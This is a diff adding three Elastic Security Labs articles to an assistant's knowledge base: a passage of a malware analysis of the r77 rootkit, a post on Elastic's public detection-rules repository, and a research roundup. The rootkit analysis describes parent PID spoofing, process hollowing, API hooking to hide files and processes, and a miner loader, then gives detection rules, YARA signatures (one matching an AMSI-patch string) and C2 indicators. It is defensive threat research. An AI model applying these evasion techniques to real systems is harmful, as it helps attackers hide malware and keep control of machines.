+The stager module next attempts to obtain the **SeDebugPrivilege** which allows it to inspect and adjust the memory of other processes.
+
+This technique triggers Elastic’s [SeDebugPrivilege Enabled by a Suspicious Process](https://www.elastic.co/guide/en/security/current/sedebugprivilege-enabled-by-a-suspicious-process.html) detection rule.
+
+#### Service module decryption and decompression
+
+Two versions of the same service module are stored in the resource section of the stager, a 32-bit and 64-bit version that will be deployed according to the system architecture.
+
+The payload is compressed using the GZip compression algorithm and it uses a simple XOR for decryption. After decompression, the stager uses the first 4-bytes as an XOR key to decrypt the rest of the data.
+
+![Decrypting the payload](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image4.jpg)
+
+#### Parent PID spoofing
+
+To make the process hollowing injection appear legitimate, the parent PID spoofing technique is used to evade threat hunters and security tooling. This technique allows attackers to run processes under any parent process they want.
+
+The malware first gets the process ID of the running **winlogon.exe** process which is a component of the Microsoft Windows operating system.
+
+![Retrieving the winlogon.exe process ID](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image1.jpg)
+
+It then uses 5 Windows APIs:
+
+1. **OpenProcess** : Get the parent process handle.
+2. **InitializeProcThreadAttributeList** : Initialize the attribute list.
+3. **UpdateProcThreadAttribute:** Set the parent process handle via the **PROC_THREAD_ATTRIBUTE_PARENT_PROCESS** attribute.
+4. **CreateProcess:** Creates a new process under the spoofed parent
+
+![Parent process PID spoofing](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image8.jpg
+
+This technique triggers Elastic’s [Parent Process PID Spoofing](https://www.elastic.co/guide/en/security/current/parent-process-pid-spoofing.html) detection rule.
+
+#### Process hollowing
+
+The malware leverages the process hollowing technique to inject its payload into a legitimate-looking Microsoft process, it chooses either **C:\\Windows\\System32\\dllhost.exe** or **C:\\Windows\\SysWow64\\dllhost.exe** depending on the malware and the machine architecture. To further obfuscate its presence, the malware generates a random GUID and generates a command line string, assigning it to the newly created process. This command line string includes the **/processid:** parameter and the GUID to mimic the behavior of a genuine **dllhost.exe** process and make it more difficult to detect.
+
+![Malware executing the process hollowing technique](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image9.jpg
+
+### Service module
+
+The service module is another essential component of the r77 rootkit responsible for carrying out critical tasks such as configuration setup in the registry. One of the primary tasks of the service module is to inject the rootkit's core into every running process on the system.
+
+#### Unhooking DLLs
+
+Using the same technique used in the stager, the binary unhooks both **NTDLL.dll** and **KERNEL32.dll**.
+
+#### Config setup
+
+The service module stores the configuration as registry entries; it first creates a key in the **HKEY_LOCAL_MACHINE\*\*** SOFTWARE\$77config\*\* file that can be modified by any user on the machine.
+
+![Creating the first configuration registry key](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image10.jpg)
+
+It then stores the current process ID running the service module as a value in a registry key named either **“svc32”** or **“svc64”** under the key **HKEY_LOCAL_MACHINE\*\*** SOFTWARE\$77config\pid\*\*. The svc32/64 key name is based on the system architecture.
+
+#### Injecting the core rootkit
+
+The final task of the service module is to create two callbacks that are responsible for injecting the final rookit’s core. The core is a DLL stored as a resource in every running process except a handful specified by the threat actor in the configuration before compiling the rootkit.
+
+The first callback is responsible for injection into every running process of the rootkit’s core, it does that by enumerating all running processes every 100 ms.
+
+The second callback is responsible for injection into newly created child processes of already infected parent processes, an inter-process communication between the service and an infected process is used to catch child process creation.
+
+The rootkit’s core hooks multiple Windows APIs. One of the important APIs is **NtResumeThread**. A parent process calls this API to start the thread execution after the creation of the child process, the installed hook sends the child’s PID to the service module through a named PIPE, in turn, the service module injects into it if the conditions allow it.
+
+The threat actors purposely avoid injection into these specific processes:
+
+- **MSBuild.exe**
+- **Services.exe**
+- **regsvr32.exe**
+- **Svchost.exe**
+- **WmiPrvSE.exe**
+- **OffOn.exe**
+- **OnOff.exe**
+- **rutserv.exe**
+- **rfusclient.exe**
+- **RMS.exe**
+- **msiexec.exe**
+- **Ma_ss.exe**
+- **masscan.exe**
+- **NLBrute.exe**
+- **run.exe**
+- **Checker.exe**
+- **Xfit.exe**
+- **cracker64.exe**
+- **SSH_Checker.exe**
+- **ViewLog.exe**
+
+### The rootkit’s core
+
+The last module is the core module, responsible for installing hooks on important Windows APIs and filtering the output of said APIs according to the rootkit’s configuration. It is a DLL loaded into running processes by the service module. Its main purpose is to set hooks using the [Detours](https://github.com/microsoft/Detours) project on important Windows API namely
+
+- **NtQuerySystemInformation**
+- **NtResumeThread**
+- **NtQueryDirectoryFile**
+- **NtQueryDirectoryFileEx**
+- **NtEnumerateKey**
+- **NtEnumerateValueKey**
+- **EnumServiceGroupW**
+- **EnumServicesStatusExW**
+- **NtDeviceIoControlFile**
+
+![Hooking NT Windows APIs](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image8.jpg
+
+These Native Windows APIs are used to enumerate/fetch information about the system, an example of that is **regedit** which relies heavily on **NtEnumerateKey** and **NtEnumerateValueKey** to enumerate the system’s registry keys. The installed hook is capable of enumerating the keys and filtering out keys that are configured by the threat actors, the rest is forwarded to the **regedit** process.
+
+By filtering the output of the Windows APIs, the core module is able to selectively hide specific files, processes, or registry keys from the system's users and security tools.
+
+### Packed PowerShell
+
+Upon further examination, our team discovered an additional binary file within the miner campaign: **$77_loader.exe**. This file, which was packed with [SAPIEN PowerShell Studio](https://www.sapien.com/software/powershell_studio), is a .NET binary that loads an embedded PowerShell script and executes it. This PowerShell script serves as the orchestrator for the entire miner campaign, directing the various processes and actions necessary to successfully install and operate a legitimate and popular crypto miner. The PowerShell script was responsible for downloading a compiled version of the open source [XMRIG miner](https://github.com/xmrig/xmrig). Specifically, the version used in this campaign was **6.15.2** , which was released in October 2021. Interestingly, the download appeared to originate from the domain **msupdate[.]info**, a well-documented and malicious domain.
+
+![PowerShell script attempt to download XMRIG](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image9.jpg
+
+The script included code to configure and execute the r77 rootkit and was responsible for opening specific firewall ports including **703** , **708** , **757** , **999** , **8080** , **443** , **80** , **14444** , **24444** , and **34444**. The script also downloaded and set up the [Remote Manipulator System](https://ru.wikipedia.org/wiki/Remote_Manipulator_System) (RMS) tool, a closed source program for remote administration, developed by the Russian company TektonIT, which could be used to remotely control the infected machine and issue commands from a remote location. Finally, the script created a new admin user ( **adm** ) on the targeted system, which could potentially be used to carry out additional attacks or exfiltrate sensitive data.
+
+## Detection logic
+
+### Prevention
+
+- [Parent Process PID Spoofing](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_parent_process_pid_spoofing.toml)
+- [Unusual Parent-Child Relationship](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_parent_child_relationship.toml)
+- [Suspicious PowerShell Engine ImageLoad](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_unusual_powershell_engine_imageload.toml)
+- [Privilege Escalation via EXTENDED STARTUPINFO](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_privilege_escalation_via_extended_startupinfo.toml)
+- [Unusual Process Running as Antimalware Protected](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_process_running_as_antimalware_protected.toml)
+
+### Detection
+
+- [Parent Process PID Spoofing](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_parent_process_pid_spoofing.toml)
+- [Unusual Parent-Child Relationship](https://github.com/elastic/detection-rules/blob/main/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml)
+- [Suspicious PowerShell Engine ImageLoad](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_suspicious_powershell_imgload.toml)
+- [Process Created with an Elevated Token](https://www.elastic.co/guide/en/security/current/process-created-with-an-elevated-token.html)
+
+### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the r77 rootkit.
+
+```
+rule Windows_Rootkit_R77_1 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2022-03-04"
+        last_modified = "2022-04-12"
+        license = "Elastic License v2"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Rootkit"
+        family = "R77"
+        threat_name = "Windows.Rootkit.R77"
+        reference_sample = "cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c"
+
+    strings:
+        $a = { 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 }
+    condition:
+        all of them
+}
+
+rule Windows_Rootkit_R77_2 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-09"
+        last_modified = "2023-05-09"
+        license = "Elastic License v2"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Rootkit"
+        family = "R77"
+        threat_name = "Windows.Rootkit.R77"
+        reference_sample = "21e7f69986987fc75bce67c4deda42bd7605365bac83cf2cecb25061b2d86d4f"
+
+    strings:
+        $a1 = { 8C 20 88 00 00 00 42 8B 44 21 10 42 8B 4C 21 1C 48 2B D0 49 }
+        $a2 = { 53 00 4F 00 46 00 54 00 57 00 41 00 52 00 45 00 5C 00 24 00 37 00 37 00 63 00 6F 00 6E 00 66 00 69 00 67 00 }
+    condition:
+        all of them
+}
+
+rule Windows_Rootkit_R77_3 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-09"
+        last_modified = "2023-05-09"
+        license = "Elastic License v2"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Rootkit"
+        family = "R77"
+        threat_name = "Windows.Rootkit.R77"
+        reference_sample = "3dc94c88caa3169e096715eb6c2e6de1b011120117c0a51d12f572b4ba999ea6"
+
+    strings:
+        $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 24 00 37 00 37 00 63 00 68 00 69 00 6C 00 64 00 70 00 72 00 6F 00 63 00 36 00 34 00 }
+        $a2 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 24 00 37 00 37 00 63 00 68 00 69 00 6C 00 64 00 70 00 72 00 6F 00 63 00 33 00 32 00 }
+    condition:
+        all of them
+}
+
+rule Windows_Rootkit_R77_4 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-18"
+        last_modified = "2023-05-18"
+        license = "Elastic License v2"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Rootkit"
+        family = "R77"
+        threat_name = "Windows.Rootkit.R77"
+        reference_sample = "91c6e2621121a6871af091c52fafe41220ae12d6e47e52fd13a7b9edd8e31796"
+
+    strings:
+        $a = { 33 C9 48 89 8C 24 C0 00 00 00 4C 8B CB 48 89 8C 24 B8 00 00 00 45 33 C0 48 89 8C 24 B0 00 00 00 48 89 8C 24 A8 00 00 00 89 8C 24 A0 00 00 00 }
+    condition:
+        $a
+}
+
+rule Windows_Rootkit_R77_5 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-18"
+        last_modified = "2023-05-18"
+        license = "Elastic License v2"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Rootkit"
+        family = "R77"
+        threat_name = "Windows.Rootkit.R77"
+        reference_sample = "916c805b0d512dd7bbd88f46632d66d9613de61691b4bd368e4b7cb1f0ac7f60"
+
+    strings:
+        $r77_str0 = "$77stager" wide fullword
+        $r77_str1 = "$77svc32" wide fullword
+        $r77_str2 = "$77svc64" wide fullword
+        $r77_str3 = "\\\\.\\pipe\\$77childproc64" wide fullword
+        $r77_str4 = "SOFTWARE\\$77config"
+        $obfuscate_ps = { 0F B7 04 4B 33 D2 C7 45 FC 34 00 00 00 F7 75 FC 66 8B 44 55 90 66 89 04 4B 41 3B CE }
+        $amsi_patch_ps = "[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3)" wide fullword
+    condition:
+        ($obfuscate_ps and $amsi_patch_ps) or (all of ($r77_str*))
+}
+
+rule Windows_Rootkit_R77_6 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-18"
+        last_modified = "2023-05-18"
+        license = "Elastic License v2"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Rootkit"
+        family = "R77"
+        threat_name = "Windows.Rootkit.R77"
+        reference_sample = "96849108e13172d14591169f8fdcbf8a8aa6be05b7b6ef396d65529eacc02d89"
+
+    strings:
+        $str0 = "service_names" wide fullword
+        $str1 = "process_names" wide fullword
+        $str2 = "tcp_local" wide fullword
+        $str3 = "tcp_remote" wide fullword
+        $str4 = "startup" wide fullword
+        $str5 = "ReflectiveDllMain" ascii fullword
+        $str6 = ".detourd" ascii fullword
+        $binary0 = { 48 8B 10 48 8B 0B E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 08 48 8B 4B 08 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 10 48 8B 4B 10 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 18 48 8B 4B 18 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 20 48 8B 4B 20 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 28 48 8B 4B 28 E8 ?? ?? ?? ?? 85 C0 }
+        $binary1 = { 8B 56 04 8B 4F 04 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 08 8B 4F 08 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 0C 8B 4F 0C E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 10 8B 4F 10 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 14 8B 4F 14 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 18 8B 4F 18 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 1C 8B 4F 1C }
+    condition:
+        (all of ($str*)) or $binary0 or $binary1
+}
+```
+
+## References
+
+The following were referenced throughout the above research
+
+- [https://github.com/microsoft/Detours](https://github.com/microsoft/Detours)
+- [https://github.com/xmrig/xmrig](https://github.com/xmrig/xmrig)
+- [https://ru.wikipedia.org/wiki/Remote_Manipulator_System](https://ru.wikipedia.org/wiki/Remote_Manipulator_System)
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/r77) in both ECS and STIX format.
+
+The following observables were discussed in this research.
+
+| Indicator                                                        | Type    | Name            | Reference                               |
+| ---------------------------------------------------------------- | ------- | --------------- | --------------------------------------- |
+| msupdate[.]info                                                  | Domain  | n/a             | C2                                      |
+| 5.133.65.53                                                      | IPV4    | n/a             | C2                                      |
+| 5.133.65.54                                                      | IPV4    | n/a             | C2                                      |
+| 5.133.65.55                                                      | IPV4    | n/a             | C2                                      |
+| 5.133.65.56                                                      | IPV4    | n/a             | C2                                      |
+| 916c805b0d512dd7bbd88f46632d66d9613de61691b4bd368e4b7cb1f0ac7f60 | SHA-256 | $77_Install.exe | Installer module                        |
+| 9fb38412cac94255a3abbec80f15620098a0c85247690850c302a9ff060b5c0c | SHA-256 | n/a             | Stager module                           |
+| 96849108e13172d14591169f8fdcbf8a8aa6be05b7b6ef396d65529eacc02d89 | SHA-256 | n/a             | 64 bit core module                      |
+| aeb6a7b9ca890dc08259d7c239eb188e466210d48a17640671cba398bf69392f | SHA-256 | n/a             | 32 bit core module                      |
+| 91c6e2621121a6871af091c52fafe41220ae12d6e47e52fd13a7b9edd8e31796 | SHA-256 | n/a             | 64 bit service module                   |
+| 29bc88a316e3f34ed29c5358e459b9fbf3b7962a72cac388ab5c977dd990ea77 | SHA-256 | n/a             | 32 bit Service module                   |
+| 10165e27e0db0a6708f346ddea657ab0409499f93eb8426a80864a966f0f401e | SHA-256 | RMS.exe         | Remote Manipulator System(RMS)          |
+| 757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551 | SHA-256 | $77_oracle.exe  | XMRIG miner                             |
+| a7e31abe10be6bca44f0a846d631e578efe78c14f6bf1cf834cfb15469fc1d3a | SHA-256 | $77_Loader.exe  | .NET binary loading a PowerShell script |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_opens_public_detection_rules_repo.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_opens_public_detection_rules_repo.md
new file mode 100644
index 0000000000000..c7f0f2712a5e8
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_opens_public_detection_rules_repo.md
@@ -0,0 +1,91 @@
+---
+title: "Elastic Security opens public detection rules repo"
+slug: "elastic-security-opens-public-detection-rules-repo"
+date: "2022-05-20"
+description: "Elastic Security has opened its detection rules repository to the world. We will develop rules in the open alongside the community, and we’re welcoming your community-driven detections. This is an opportunity to share collective security knowledge."
+author:
+  - slug: ross-wolf
+  - slug: elastic-security-intelligence-analytics-team
+image: "blog-thumb-gears-steel.jpg"
+category:
+---
+
+At Elastic, we believe in the [power of open source](https://www.elastic.co/about/why-open-source) and understand the importance of community. By putting the community first, we ensure that we create the best possible product for our users. With Elastic Security, [two of our core objectives](https://www.elastic.co/security) are to _stop threats at scale_ and _arm every analyst_. Today, we’re opening up a new GitHub repository, [elastic/detection-rules](https://github.com/elastic/detection-rules), to work alongside the security community, stopping threats at a greater scale.
+
+The release of the [detection engine](https://www.elastic.co/blog/elastic-siem-detections) in Elastic Security brought [automated threat detection](https://www.elastic.co/security/automated-threat-protection) to the Elastic Stack. Since the initial launch of the detection engine, the Elastic Security Intelligence & Analytics team has added 50+ additional rules, increasing the visibility of attacker techniques on Linux, macOS, and Windows operating systems. As we continue to expand coverage, you’ll see increased breadth in detections, covering new domains such as cloud services and user behavior.
+
+Over the past few releases, we used an internal repository to manage rules for the detection engine. We’ve iteratively improved our testing procedures by adding automated tests for new contributions that validate Kibana Query Language (KQL) syntax, schema usage, and other metadata. Our rule development has matured, so we can move fast _without_ breaking things.
+
+By opening up our [elastic/detection-rules](https://github.com/elastic/detection-rules) GitHub repository, Elastic Security will develop rules in the open alongside the community, and we’re welcoming your community-driven detections. This is an opportunity for all of us to share our collective knowledge, learn from each other, and make an impact by working together.
+
+## What’s in this new repository?
+
+In the [elastic/detection-rules](https://github.com/elastic/detection-rules) GitHub repository, you can find rules written for Elastic Security, with coverage for many [MITRE ATT&CK](https://attack.mitre.org/)® techniques. Our current rule logic is primarily written in [KQL](https://www.elastic.co/guide/en/kibana/master/kuery-query.html), and by leveraging the [Elastic Common Schema (ECS)](https://www.elastic.co/guide/en/ecs/current/index.html), we only need to write rules once. By using the defined fields and categories in ECS, rules automatically work with Beats logs and other data sources that map properly to ECS.
+
+Within the [rules/](https://github.com/elastic/detection-rules/tree/main/rules) folder, rules are stored in TOML files and are grouped by platform. We tried to keep it simple with a flat hierarchy so that it’s easier to find and add new rules. If you’re looking for Windows-only rules, navigate to [rules/windows](https://github.com/elastic/detection-rules/tree/main/rules/windows). If you’re still struggling to find a rule or want to search across rules, you can use our CLI by running the command python -m detection_rules rule-search, which will show the files that have matching metadata.
+
+Every rule contains several fields of metadata in addition to the query itself. This captures information like the title, description, noise level, ATT&CK mappings, tags, and the scheduling interval. We have a few additional fields to aid analysts performing triage, describing known false positives or helpful steps for an investigation. For more information on the metadata that pertains to rules, see the [Kibana rule creation guide](https://www.elastic.co/guide/en/siem/guide/current/rules-ui-create.html#create-rule-ui) or our [summary of rule metadata](https://github.com/elastic/detection-rules/blob/main/CONTRIBUTING.md#rule-metadata) in the contribution guide.
+
+![detection-rules-repo-blog-msbuild.png](https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt683eae32569f7543/5efb61e38304ac0dbc4a5a0e/detection-rules-repo-blog-msbuild.png)
+
+Preview of the file behind the “MsBuild Making Network Connections” rule
+
+## How do these rules get to my detection engine?
+
+If you’re using our [Elastic Cloud managed service](https://www.elastic.co/cloud/) or the default distribution of the Elastic Stack software that includes the [full set of free features](https://www.elastic.co/subscriptions), you’ll get the latest rules the first time you navigate to the detection engine. When you upgrade, the detection engine recognizes that rules were added or changed and [prompts](https://www.elastic.co/guide/en/siem/guide/current/rules-ui-create.html#load-prebuilt-rules) you to decide whether you want those rules upgraded. Follow the steps after upgrading and you’ll get the latest copy of the rules.
+
+![detection-rules-repo-blog-msbuild-network-connections.png](https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1ca938b9d35957ee/5efb6250f715ab0f6bc3dea1/detection-rules-repo-blog-msbuild-network-connections.png)
+
+The same rule — “MsBuild Making Network Connections” — loaded in the detection engine
+
+## Who will use this repository?
+
+This repository is where the Elastic Security Intelligence & Analytics team will develop rules, create issues, manage pull requests, and target releases. By making the repo public, we’re inviting all external contributors into this workflow. This will give contributors visibility into our development process and a clear path for rules to be released with the detection engine.
+
+When you’re ready to contribute, please sign Elastic's [contributor license agreement (CLA)](https://www.elastic.co/contributor-agreement). This is standard for all Elastic GitHub repositories, and it means that we freely can distribute your code to Elastic users.
+
+## How do we approach threat detection?
+
+In general, we tend to prefer detections that focus on adversary behaviors. This usually means that we focus on ATT&CK techniques. This might mean more research and effort is needed to figure out how a technique works before creating a rule. But by taking this approach, we do a better job detecting and stopping the attacks of today and tomorrow, instead of just the attacks of yesterday.
+
+Taking a behavioral approach also means we need various types of rules. Some might detect atomic events, others may require aggregating multiple events or looking for deviances above a threshold. With [Event Query Language (EQL)](https://eql.readthedocs.io), we will be able to write rules that look for sequences of behavior that span multiple events.
+
+Of course, we understand that sometimes a technique can be hard for all users to detect behaviorally. In that case, by all means, feel free to add a rule that is more signature-like in nature and written towards a specific behavior or tool.
+
+For a longer discussion on what makes a mature detection, read about the philosophy [of the detection rules repository](https://github.com/elastic/detection-rules/tree/main/PHILOSOPHY.md).
+
+## Why do we need a new repository?
+
+If you’ve shared public rules before, you’re probably aware of other well-known GitHub repositories, like the [Cyber Analytics Repository (CAR)](https://github.com/mitre-attack/car) by MITRE, [Sigma](https://github.com/Neo23x0/sigma), or even the [EQL Analytics Library](https://eqllib.readthedocs.io) based on Elastic’s EQL. You might be wondering: _Why do we need another repository? Why not use the ones that already exist?_
+
+Unsurprisingly, the best answer to this question starts with another question: _Why do the other repositories exist?_ Both CAR and Sigma are purposefully agnostic of language or platform, and sometimes data source. On the other hand, the EQL Analytics Library was written with a specific language in mind.
+
+With our new detection rules repository, we’re trying to serve a slightly different purpose. Our goal is to give users of Elastic Security the best possible detections that work across various data sources. We use ECS as the great equalizer of schemas, making it possible to write a rule once that applies to multiple data sources.
+
+Since the Elastic Stack supports multiple languages, our rules should reflect that. Query languages are typically developed to solve different types of problems, and we shouldn’t constrain rule developers to a single language if another does the job better. We currently have [KQL](https://www.elastic.co/guide/en/kibana/master/kuery-query.html) and [Lucene](https://www.elastic.co/guide/en/kibana/current/lucene-query.html) rules, along with rules that use [machine learning anomaly detection](https://www.elastic.co/guide/en/machine-learning/6.8/ml-jobs.html) jobs in the repository. We’re [working hard](https://github.com/elastic/elasticsearch/issues/49581) to bring [EQL](https://eql.readthedocs.io) to the Elastic Stack and into our repository.
+
+We can also ensure best practices are being followed for optimal Elasticsearch performance. For example, searching for process.path:\*\\\\cmd.exe requires performing a wildcard check, which is more costly than a simple keyword check. Instead of searches containing leading wildcards, we can recommend using process.name:cmd.exe, which will result in better performance and the most accurate results. On a similar note, ECS also contains the field process.args, which is a parsed version of process.command_line. We recommend using the parsed field instead, because it gives us better performance and means that we are much less prone to [trivial whitespace or quotation-based evasions](https://github.com/elastic/detection-rules/blob/main/PHILOSOPHY.md#does-a-rule-have-trivial-evasions). Win-win.
+
+## Can I add rules from another repository?
+
+Within your own environment, you’re welcome to add rules to your own detection engine as long as your Kibana role has the right permissions. If you want to add rules to the [elastic/detection-rules](https://github.com/elastic/detection-rules) repository, the answer is an unsurprising: [_It depends..._](https://www.elastic.co/blog/it-depends)_._ As long as a rule can be sublicensed under the Elastic License, this is fair game. Most of the time, the requirements are fairly straightforward — retain the original authors in the rule.author array, and update the NOTICE.txt file accordingly to give attribution to the original authors. We don’t want to take credit for someone else’s work, so please help us be thorough!
+
+For more information on how we approach licensing in the repository, check the [Licensing](https://github.com/elastic/detection-rules#licensing) section of the README.
+
+## How do I contribute?
+
+Eager to share your rule logic? Hop on over to [elastic/detection-rules](https://github.com/elastic/detection-rules) on GitHub. We have detailed instructions there for navigating the repository, forking and cloning, and creating a rule. We include a command line tool for bulk editing the files and to make creating new rules easier. When you’re ready to add a new rule to the repository, run python -m detection_rules create-rule, and you’ll be prompted for the required metadata. We recommend using the CLI when possible, because it reduces copy-and-paste errors that happen when reusing contents from a TOML file from another rule or template.
+
+When your rule is in a good state, you can run the command python -m detection_rules test to locally perform unit tests, which validate syntax, schema usage, etc. Then, create the pull request and someone on the Intelligence & Analytics team will review the contribution. If we request any changes, we’ll work with you to make the recommended changes.
+
+If you have a good idea for a rule, but want to collaborate with us on the idea or get feedback, feel free to create a [New Rule](https://github.com/elastic/detection-rules/issues/new/choose) issue. We look forward to helping and brainstorming with you!
+
+For more information, check out the [contribution](https://github.com/elastic/detection-rules/tree/main/CONTRIBUTING.md) guide.
+
+## What’s next?
+
+Welcome to our new rules repository and workflow! Your contributions are encouraged, and we look forward to seeing your name in the rule.author field. The detection rules repository will continue to evolve along with the rest of Elastic Security, and we’re excited for what’s next.
+
+If you want to track the development of EQL in the stack, subscribe to this [GitHub issue](https://github.com/elastic/elasticsearch/issues/49581). Or take a peek at the [ongoing documentation](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) to watch what the Elasticsearch team is up to.
+
+If you have any feedback or questions writing rules or navigating our new [detection rules](https://github.com/elastic/detection-rules) GitHub repository, please [create an issue](https://github.com/elastic/detection-rules/issues/new/choose) in GitHub, reach out on the [discussion forum](https://discuss.elastic.co/c/security) with the _detection-rules_ tag, or find us in the _#detection-rules_ channel of the [Elastic Slack Community](http://ela.st/slack).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_research_roundup.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_research_roundup.md
new file mode 100644
index 0000000000000..97b21f8349f15
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_research_roundup.md
@@ -0,0 +1,38 @@
+---
+title: "Elastic Security Research Roundup"
+slug: "elastic-security-research-roundup"
+date: "2022-09-09"
+description: "Elastic Security Intelligence and Analytics researches and investigates threat actors, malware, campaigns, or a specific intrusion. We’ll highlight recent research about Log4j, BLISTER, Cobalt Strike, and Operation Bleeding Bear."
+author:
+  - slug: elastic-security-team
+image: "blog-thumb-blind-spots.png"
+category:
+---
+
+The job of researching the latest vulnerabilities, campaigns, attack patterns, and threat actors is never complete. The [Elastic Security Intelligence and Analytics team’s](https://github.com/elastic/security-research) charter is to democratize access to knowledge and capabilities. We believe doing so is the key to changing the threat landscape and we publish this information to educate Elastic customers and the larger security community.
+
+Our security team researches and publishes information about malware, threat actors, campaigns, attack patterns, and specific vulnerabilities. Here’s a roundup of our latest findings and how to protect your organization.
+
+## Log4j vulnerability research
+
+Quickly after the Log4j vulnerability was released, Elastic provided guidance on how to find the [Log4Shell vulnerability](https://www.elastic.co/blog/log4j2-vulnerability-what-to-know-security-vulnerability-learn-more-elastic-support) using the Elastic Security and Observability solutions. Log4sh impacted organizations from Minecraft to Oracle during one of the busiest vacation seasons. Elastic researched the vulnerability and published more than four articles about this threat quickly as the threat unfolded, including a [response and analysis](https://www.elastic.co/blog/analysis-of-log4shell-cve-2021-45046?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j) on the security flaw itself and an up-to-date blog on [how to detect log4j2 exploits using Elastic Security](https://www.elastic.co/blog/detecting-log4j2-with-elastic-security?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=detecting+log4j2+blog). As this threat continues to unfold, so will the research from Elastic on the topic.
+
+## BLISTER malware campaign campaign, identified by Elastic Security
+
+The Elastic Security Intelligence and Analytics team recently uncovered the [BLISTER malware campaign](https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign) and delivered the first research about this campaign. Elastic researchers uncovered a novel malware loader, BLISTER, that was used to execute second-stage, in-memory malware payloads and maintain persistence during the campaign execution — leveraging valid code signing certificates to evade detection.
+
+At the time of the research being published, VirusTotal had very low or no detections active for the identified malware samples. After the research was published, VirusTotal and other security vendors began tagging actions from this malware campaign as suspicious.
+
+## Beaconing malware attacks
+
+Beaconing software can be difficult to detect. Elastic researchers have recently written several articles about this type of command and control communication and how to identify it. The Elastic team recently published research about how to [find and respond to Cobalt Strike beaconing attacks](https://www.elastic.co/blog/bringing-home-the-beacon-cobalt-strike). Additionally, the team provided a detailed how-to article on how to [find beaconing malware with Elastic](https://www.elastic.co/blog/identifying-beaconing-malware-using-elastic).
+
+## Operation Bleeding Bear
+
+Elastic research also recently verified malware attacking the Ukraine government, [Operation Bleeding Bear](https://www.elastic.co/blog/elastic-security-verifies-operation-bleeding-bear). After the vulnerability had been identified publicly, Elastic quickly verified the evasive malware and published research to alert Elastic customers and the security industry as a whole.
+
+## Threats yet discovered…
+
+The Elastic Security Intelligence and Analytics team continues to research and respond to groundbreaking threats in its mission to help Elastic customers and the broader security community. If you’re using [Elastic Security](https://www.elastic.co/security?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=elastic+security) already, you can expect to see our latest findings in the newsfeed within the platform. We’ll also post our latest findings on [elastic.co/blog](https://www.elastic.co/blog).
+
+Did you know that you can get started with a free [14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=trail)? Or [download](https://www.elastic.co/downloads/?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=download) the self-managed version of the Elastic Stack for free.
